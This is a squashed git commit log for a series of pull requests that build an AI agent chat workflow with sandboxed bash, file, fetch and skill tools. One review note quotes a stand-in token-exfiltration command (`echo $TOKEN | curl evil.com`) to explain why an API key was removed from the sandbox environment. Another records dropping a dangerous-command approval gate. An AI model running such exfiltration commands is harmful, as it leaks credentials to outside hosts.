+ unawaited cancellation could escape the try/catch. cubic P2 fixes: - updateChat updates parameter narrowed to `ChatMutableFields` (excludes id, session_id, created_at). - persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to body-budget = max - suffix. - runAgentStep: acquire writer once, release in finally. Per-chunk writer acquisition could leak the lock on write failure. - runAgentWorkflow: capped at a single turn until messages threading lands with tool ports (PR 4). Multi-turn loop with the same input was unsafe — log+warn if model returns tool-calls and exit. Tests reworked: 231 in the touched files all green; full suite 2949/2949; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): top-level import in reconcileExistingActiveStream The dynamic `await import("workflow/api")` inside the function body was a carry-over from open-agents — handleChatWorkflowStream.ts already top-level imports `start` and `getRun` from the same package, so there's no reason for the lib to defer. Moving to a normal top-level import for consistency. Also tightens the cancel-throws handler test to use the same deferred- rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's unhandled-rejection watcher doesn't trip on the mock setup. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): move active_stream_id CAS out of supabase lib Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific predicate logic doesn't belong in the Supabase plumbing. Restructured: - `lib/supabase/chats/updateChat.ts` now generic. The filter accepts `where: Partial<Tables<"chats">>` (a generic predicate that maps to `column = value` or `column IS NULL`) so no column name is hardcoded in the Supabase lib. - `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper. Owns the "compare-and-set on active_stream_id" concept and returns a discriminated `{ok, claimed} | {ok: false, error}` result. Handler and reconcileExistingActiveStream both compose against this wrapper instead of constructing predicates inline. - Handler + reconcile updated to use the wrapper. Tests follow. 37/37 tests in touched files pass; full suite 2955/2955; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth Two production-build issues surfaced by Vercel that local pnpm test + tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's errors were all in __tests__ unrelated to this PR). 1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }` narrowing wasn't kicking in under Next.js's strict TS plugin. Switched to `if ("error" in result)` (in-operator narrowing) which reliably discriminates the union members regardless of literal-type inference quirks. 2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...) .update(...).eq(...)` + reassignment in a `for` loop (`.is()` / `.eq()` per where entry) caused "type instantiation is excessively deep" — Supabase's PostgrestFilterBuilder is heavily generic and the reassignment kept expanding the type. Rewrote as: split where map into equality matches (one `.match(obj)` call) + nullable columns (reduced with `.is(col, null)` typed back to the original builder). Both bugs were behavior-neutral — the function shape and contract are unchanged. 37/37 tests in touched files green; full suite 2955/2955; lint clean; `pnpm build` now succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583) * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim) Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it through the workflow via streamText's `experimental_context`. Proves the entire tool-execution machinery works end-to-end. The remaining 10 tools (read, write, grep, glob, todo, task, ask_user_question, skill, fetch + utils) port in a follow-up; this PR's scope was deliberately held to one tool so the wire-up is reviewable in isolation. New files: - lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard, getSandbox() that reconnects via connectVercel(state) per call. - lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN, RECOUP_ORG_ID } env builder from context. - lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts adapted to api's Sandbox interface. Injects recoup env on foreground execs only (detached processes outlive the prompt → no token). - lib/agent/buildAgentTools.ts — factory returning the agent's tool record. Adding the remaining tools is a one-line append to this map. Wire-up: - runAgentStep now accepts `agentContext`, passes into streamText as experimental_context, and uses streamText's internal multi-step loop (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop in runAgentWorkflow needed. - handleChatWorkflowStream derives recoupOrgId from session.clone_url via extractOrgId, builds AgentContext with session.sandbox_state + validated.authToken, passes to start(workflow). Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory + 3 workflow file updates picked up by existing tests). Full suite 2978/2978 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure Sweetman KISS/SRP feedback (4 comments): - Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's default stop condition handles tool-call iteration without an arbitrary cap that could silently truncate the only workflow turn. - Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from bashTool. All model-issued commands are trusted in this PR — host- side gating belongs at the route/UI layer if it ever returns. - Removed `needsApproval` from bashTool entirely (subsumes cubic P1 about the broken override ordering — the gate itself is gone). - Split `lib/agent/tools/utils.ts` into per-function files: - `AgentContext.ts` — type - `isAgentContext.ts` — guard - `getSandbox.ts` — sandbox reconnection No catch-all utils file. Cubic feedback: - **P0**: Removed `recoupAccessToken` from AgentContext + handler + buildRecoupExecEnv. Handing the long-lived api key to bash would let any model-issued command exfiltrate it via env (`echo $TOKEN | curl evil.com`). Slim PR 4 has no actual consumer for the token — only the future `skill` tool needs it. Proper short-lived token minting will land alongside that port. - **P2** (`isAgentContext` too weak): tightened the guard to validate sandbox.state is a non-null object AND sandbox.workingDirectory is a non-empty string. Earlier guard returned true for `{ sandbox: {} }`, letting tools later crash on undefined fields. - P1 + P2 about stopWhen / needsApproval: resolved by sweetman's deletions above. - P2 (test file >100 lines): dismissed — same as PR 3 review. The repo has no enforced max-lines rule; existing tests routinely exceed 700 lines. Tests updated for the new shape. 25 tests in touched files green (8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv + 2 factory). Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow Per discussion on PR #583. Restoring the streamText stop condition so the workflow agent gets the model wrap-up turn after a tool call (model → tool → tool-result → model → text response), instead of stopping at streamText's default `stepCountIs(1)` after the first tool call. DRY by sharing one constant between the two chat endpoints: - New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts. Inherits the value that /api/chat already uses (originally hardcoded in getGeneralAgent.ts:55) — high enough that normal flows never hit the cap but bounds runaway loops for cost / replay safety. - lib/agents/generalAgent/getGeneralAgent.ts: imports the constant instead of constructing stepCountIs(111) inline. - app/lib/workflows/runAgentStep.ts: imports the constant, passes to streamText as `stopWhen`. Single-shot agents (createCompactAgent, createContentPromptAgent, createEmailReplyAgent) intentionally keep their local `stepCountIs(1)` — they're not in the multi-step chat family. Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585) * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5) Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing. New tool files (one tool per file, per sweetman SRP): - readFileTool.ts — read with 1-indexed offset/limit, numbered output - writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile - editFileTool.ts — exact-string replace, ambiguous-match rejection - grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200 - globTool.ts — find -printf with mtime sort, GNU/BSD-compatible - todoWriteTool.ts — stateless planning surface; echoes the list back - webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB New helpers (utilities used by multiple tools): - shellEscape.ts — `'` → `'\''` dance - toDisplayPath.ts — absolute → relative-when-inside-workdir display path buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (`task`, `ask_user_question`, `skill`) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR. Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers) Per PR 585 review question — most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in PR 4 review). AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing. Harmonized to direct-value exports across all 8 tools: - bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper. - buildAgentTools.ts: dropped the matching `()` calls. - 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly). Full suite 3014/3014 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579) * feat(chat-workflow): add POST /api/chat/workflow route stub Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed chat endpoint documented in recoupable/docs#221. The stub validates the full request contract (auth, body, session/chat ownership, sandbox active) and returns a hardcoded UIMessage stream with an x-workflow-run-id: stub-<uuid> header — so the chat-side team can integrate against the real response shape today while the workflow itself is being ported from open-agents in follow-up PRs. Files: - app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS - lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat ownership → sandbox check → stub UIMessage stream - lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI ChatWorkflowRequest (messages, chatId, sessionId, optional context.contextLimit) Status codes implemented (match contract docs): - 200 — UIMessage stream + x-workflow-run-id header - 400 — invalid JSON / invalid body / "Sandbox not initialized" - 401 — validateAuthContext passthrough - 403 — session not owned by API key's account - 404 — session or chat not found (incl. chat under different session) - 500 — selectSessions returned null (DB error) 409 (duplicate workflow run for chat) is deferred to the wire-up PR that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet. Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — SRP/DRY cleanup Two review fixes per PR feedback: 1. SRP/DRY — drop the local errorResponse helper from handleChatWorkflowStream.ts; use the shared lib/networking/errorResponse and lib/zod/validationErrorResponse helpers instead. 2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts into the validator. Rename validateChatWorkflowBody → validateChatWorkflow so it accepts a full NextRequest (like the existing validateChatRequest) and returns an auth-augmented body (accountId/orgId/authToken). The handler now opens with a single `validateChatWorkflow(request)` call. Tests reshaped to match new seams: - Validator test mocks validateAuthContext only - Handler test mocks validateChatWorkflow (the new seam) - Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed into a single "validator short-circuit passes through" test — both are now the validator's responsibility, not the handler's 22/22 new tests green; full suite 2900/2900 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * chore: revert unrelated local changes accidentally swept into PR Previous commit (9262f65) used `git add -A` which picked up local Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak that aren't part of this PR's scope. Removing them now so the PR diff stays scoped to the chat-workflow refactor. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581) * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones (`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired — the workflow runs streamText with the gateway model + Recoup custom instructions only. Sandbox tool surface comes in a follow-up PR. What's now plumbed end-to-end: - validateChatWorkflow → session+chat ownership → sandbox active → reconcile existing active_stream_id (resume / 409 / fall-through) → refresh lifecycle activity → fire-and-forget persist user message → start runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) → return run.getReadable() with x-workflow-run-id header New helpers (Supabase): - compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id - touchChat — bump chats.updated_at - updateChat — generic partial update mirroring updateSession's shape - createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert - isFirstChatMessage — true iff exactly one row exists matching messageId New helpers (chat/recoupable): - extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased) - agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt - persistLatestUserMessage — fire-and-forget user msg + title-from-first-80 - reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop New workflow files: - app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper - app/workflows/runAgentStep.ts — `"use step"`, single streamText turn Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest + 6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored). Full suite: 2946/2946 pass, lint clean. Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools). Without tools, `finishReason` is always "stop" after one turn — the runAgentWorkflow loop shape is in place but only iterates once today. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — structural + P1/P2 fixes Sweetman structural feedback (KISS / OCP): - Move workflow files: app/workflows/runAgent{Workflow,Step}.ts → app/lib/workflows/runAgent{Workflow,Step}.ts - Generic Supabase helpers + domain wrappers: - Generic `updateChat({filter, updates})` with optional CAS predicate on active_stream_id. Subsumes compareAndSetChatActiveStreamId and touchChat (both deleted). - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces domain-specific isFirstChatMessage. The "is earliest?" check now lives in persistLatestUserMessage where it belongs. - Rename createChatMessageIfNotExists → `upsertChatMessage` with a discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so callers can tell duplicates from DB errors. - Extract resume-stream block from handler into `maybeResumeChatStream.ts` (OCP — handler stays small, resume logic grows independently). cubic P1 fixes: - CAS-before-start: handler now claims `active_stream_id` with a `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the race where two requests could both bill the model before one lost the CAS. After start(), promotes the placeholder to the real run id. - updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}` so callers distinguish "race lost" (rowsUpdated:0) from DB errors. - reconcileExistingActiveStream: bare try/catch on getRun no longer clears stale active_stream_id on transient workflow API failures — we treat any uncertainty as conflict. Failed CAS-clear on a completed run also returns conflict (rather than possibly falling through to ready on a DB read error). - await getRun(runId).cancel() in handler — previously synchronous + unawaited cancellation could escape the try/catch. cubic P2 fixes: - updateChat updates parameter narrowed to `ChatMutableFields` (excludes id, session_id, created_at). - persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to body-budget = max - suffix. - runAgentStep: acquire writer once, release in finally. Per-chunk writer acquisition could leak the lock on write failure. - runAgentWorkflow: capped at a single turn until messages threading lands with tool ports (PR 4). Multi-turn loop with the same input was unsafe — log+warn if model returns tool-calls and exit. Tests reworked: 231 in the touched files all green; full suite 2949/2949; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): top-level import in reconcileExistingActiveStream The dynamic `await import("workflow/api")` inside the function body was a carry-over from open-agents — handleChatWorkflowStream.ts already top-level imports `start` and `getRun` from the same package, so there's no reason for the lib to defer. Moving to a normal top-level import for consistency. Also tightens the cancel-throws handler test to use the same deferred- rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's unhandled-rejection watcher doesn't trip on the mock setup. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): move active_stream_id CAS out of supabase lib Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific predicate logic doesn't belong in the Supabase plumbing. Restructured: - `lib/supabase/chats/updateChat.ts` now generic. The filter accepts `where: Partial<Tables<"chats">>` (a generic predicate that maps to `column = value` or `column IS NULL`) so no column name is hardcoded in the Supabase lib. - `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper. Owns the "compare-and-set on active_stream_id" concept and returns a discriminated `{ok, claimed} | {ok: false, error}` result. Handler and reconcileExistingActiveStream both compose against this wrapper instead of constructing predicates inline. - Handler + reconcile updated to use the wrapper. Tests follow. 37/37 tests in touched files pass; full suite 2955/2955; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth Two production-build issues surfaced by Vercel that local pnpm test + tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's errors were all in __tests__ unrelated to this PR). 1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }` narrowing wasn't kicking in under Next.js's strict TS plugin. Switched to `if ("error" in result)` (in-operator narrowing) which reliably discriminates the union members regardless of literal-type inference quirks. 2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...) .update(...).eq(...)` + reassignment in a `for` loop (`.is()` / `.eq()` per where entry) caused "type instantiation is excessively deep" — Supabase's PostgrestFilterBuilder is heavily generic and the reassignment kept expanding the type. Rewrote as: split where map into equality matches (one `.match(obj)` call) + nullable columns (reduced with `.is(col, null)` typed back to the original builder). Both bugs were behavior-neutral — the function shape and contract are unchanged. 37/37 tests in touched files green; full suite 2955/2955; lint clean; `pnpm build` now succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583) * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim) Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it through the workflow via streamText's `experimental_context`. Proves the entire tool-execution machinery works end-to-end. The remaining 10 tools (read, write, grep, glob, todo, task, ask_user_question, skill, fetch + utils) port in a follow-up; this PR's scope was deliberately held to one tool so the wire-up is reviewable in isolation. New files: - lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard, getSandbox() that reconnects via connectVercel(state) per call. - lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN, RECOUP_ORG_ID } env builder from context. - lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts adapted to api's Sandbox interface. Injects recoup env on foreground execs only (detached processes outlive the prompt → no token). - lib/agent/buildAgentTools.ts — factory returning the agent's tool record. Adding the remaining tools is a one-line append to this map. Wire-up: - runAgentStep now accepts `agentContext`, passes into streamText as experimental_context, and uses streamText's internal multi-step loop (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop in runAgentWorkflow needed. - handleChatWorkflowStream derives recoupOrgId from session.clone_url via extractOrgId, builds AgentContext with session.sandbox_state + validated.authToken, passes to start(workflow). Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory + 3 workflow file updates picked up by existing tests). Full suite 2978/2978 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure Sweetman KISS/SRP feedback (4 comments): - Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's default stop condition handles tool-call iteration without an arbitrary cap that could silently truncate the only workflow turn. - Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from bashTool. All model-issued commands are trusted in this PR — host- side gating belongs at the route/UI layer if it ever returns. - Removed `needsApproval` from bashTool entirely (subsumes cubic P1 about the broken override ordering — the gate itself is gone). - Split `lib/agent/tools/utils.ts` into per-function files: - `AgentContext.ts` — type - `isAgentContext.ts` — guard - `getSandbox.ts` — sandbox reconnection No catch-all utils file. Cubic feedback: - **P0**: Removed `recoupAccessToken` from AgentContext + handler + buildRecoupExecEnv. Handing the long-lived api key to bash would let any model-issued command exfiltrate it via env (`echo $TOKEN | curl evil.com`). Slim PR 4 has no actual consumer for the token — only the future `skill` tool needs it. Proper short-lived token minting will land alongside that port. - **P2** (`isAgentContext` too weak): tightened the guard to validate sandbox.state is a non-null object AND sandbox.workingDirectory is a non-empty string. Earlier guard returned true for `{ sandbox: {} }`, letting tools later crash on undefined fields. - P1 + P2 about stopWhen / needsApproval: resolved by sweetman's deletions above. - P2 (test file >100 lines): dismissed — same as PR 3 review. The repo has no enforced max-lines rule; existing tests routinely exceed 700 lines. Tests updated for the new shape. 25 tests in touched files green (8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv + 2 factory). Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow Per discussion on PR #583. Restoring the streamText stop condition so the workflow agent gets the model wrap-up turn after a tool call (model → tool → tool-result → model → text response), instead of stopping at streamText's default `stepCountIs(1)` after the first tool call. DRY by sharing one constant between the two chat endpoints: - New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts. Inherits the value that /api/chat already uses (originally hardcoded in getGeneralAgent.ts:55) — high enough that normal flows never hit the cap but bounds runaway loops for cost / replay safety. - lib/agents/generalAgent/getGeneralAgent.ts: imports the constant instead of constructing stepCountIs(111) inline. - app/lib/workflows/runAgentStep.ts: imports the constant, passes to streamText as `stopWhen`. Single-shot agents (createCompactAgent, createContentPromptAgent, createEmailReplyAgent) intentionally keep their local `stepCountIs(1)` — they're not in the multi-step chat family. Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585) * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5) Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing. New tool files (one tool per file, per sweetman SRP): - readFileTool.ts — read with 1-indexed offset/limit, numbered output - writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile - editFileTool.ts — exact-string replace, ambiguous-match rejection - grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200 - globTool.ts — find -printf with mtime sort, GNU/BSD-compatible - todoWriteTool.ts — stateless planning surface; echoes the list back - webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB New helpers (utilities used by multiple tools): - shellEscape.ts — `'` → `'\''` dance - toDisplayPath.ts — absolute → relative-when-inside-workdir display path buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (`task`, `ask_user_question`, `skill`) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR. Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers) Per PR 585 review question — most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in PR 4 review). AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing. Harmonized to direct-value exports across all 8 tools: - bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper. - buildAgentTools.ts: dropped the matching `()` calls. - 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly). Full suite 3014/3014 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587) * feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) Ports the `skill` composite tool from open-agents along with the skill discovery layer it depends on. The handler now connects to the sandbox before workflow start, scans `${workingDirectory}/skills/` for project- level skills, and threads the catalog into the workflow via `AgentContext.skills`. The `skill` tool is registered in `buildAgentTools` only when the catalog is non-empty — so models in sandboxes without skills never see the tool. New skills layer (lib/skills/): - skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema, frontmatterToOptions (Zod schema + camelCase normalization) - parseSkillFrontmatter.ts — hand-rolled YAML subset parser (key:value, quoted strings, booleans; preserves colons in URLs) - extractSkillBody.ts — strip frontmatter, return body - substituteArguments.ts — $ARGUMENTS replacement - injectSkillDirectory.ts — prepend `Skill directory: <path>` - discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name, drop names that shadow built-in /model /resume /new - getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]` only. Global skills (~/.skills) port later alongside short-lived token minting New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup, respects `disable-model-invocation`, surfaces available-skills list on unknown name. Loads SKILL.md content, applies extractSkillBody → injectSkillDirectory → substituteArguments, returns to the model. Wire-up: - AgentContext gains `skills?: SkillMetadata[]` - buildAgentTools accepts `{ skills }`, registers skill tool when non-empty - runAgentStep passes `agentContext.skills` to buildAgentTools - handleChatWorkflowStream connects sandbox + discoverSkills before start(workflow); empty catalog on discovery failure (best-effort, never blocks the request) Slim scope decisions: - Project skills only (no global ~/.skills/ scan yet) - No short-lived token minting; the recoup-api skill would still load + return content, but its curl examples wouldn't authenticate without ad-hoc credentials. Token minting becomes a separate PR where it can be designed properly (Privy JWT vs server-minted JWT scoped to accountId + sandbox session). Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2 injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills + 7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(skills): match open-agents 3-path scan (was scanning the wrong dir) The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/ — a path that doesn't exist in real recoupable sandboxes. The actual layout (mirrored from open-agents/apps/web/lib/skills/directories.ts): - \${workingDirectory}/.claude/skills/ (project, claude-style) - \${workingDirectory}/.agents/skills/ (project, agents-style) - \${HOME}/.agents/skills/ (global; populated at provisioning by installSessionGlobalSkills) Also drops the earlier deferral comment: global skills load fine WITHOUT short-lived token minting. The skill tool returns SKILL.md content to the model; only the curl examples *inside* SKILL.md need auth credentials, and those can be supplied ad-hoc until proper token minting lands. Changes: - getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory to find the sandbox's actual $HOME — defaults to /root) - exports the two sub-functions (getProjectSkillDirectories + getGlobalSkillsDirectory) so they're individually testable - Handler awaits the async path resolution - New test suite covers all 3 paths + $HOME variants Caught by sweetman pointing out that this same repo (org-rostrum-pacific) DOES show skills in open-agents — proving the slim deferral was wrong. Full suite 3053/3053; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback) Two changes per user direction: 1. **YAGNI: drop project-skill directory scanning.** All skills are provisioned globally via `installSessionGlobalSkills` at sandbox startup — org repos do NOT bundle their own skill directories. getSandboxSkillDirectories now returns just the single global path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories and the PROJECT_SKILL_BASE_FOLDERS array. 2. **SRP: extract getSkills into its own file.** Previously inline in skillTool.ts (per sweetman comment on PR 587). Now lives at lib/skills/getSkills.ts with its own tests. Future skill-aware consumers (e.g. system-prompt builders) share the same accessor instead of duplicating the context-cast. Verified live on preview against \`recoupable/org-rostrum-pacific-...\` BEFORE this commit: - Sandbox provisioning installs 2 globals at /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace) - Agent invoked \`skill({ skill: "recoup-api" })\` successfully, received 11,173 chars of SKILL.md content with the correct "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api" header Full suite 3055/3055; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory Per sweetman PR review (comments r3283710486 and r3283762023). Each helper now lives in its own file with its own focused test suite: - lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null when neither exists) - lib/skills/getGlobalSkillsDirectory.ts — was inlined in getSandboxSkillDirectories.ts - 2 new unit tests (standard path, trailing-slash tolerance) discoverSkills now imports findSkillFile. getSandboxSkillDirectories imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories test loses its inline getGlobalSkillsDirectory cases (those moved to the dedicated test file). Full suite passes; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

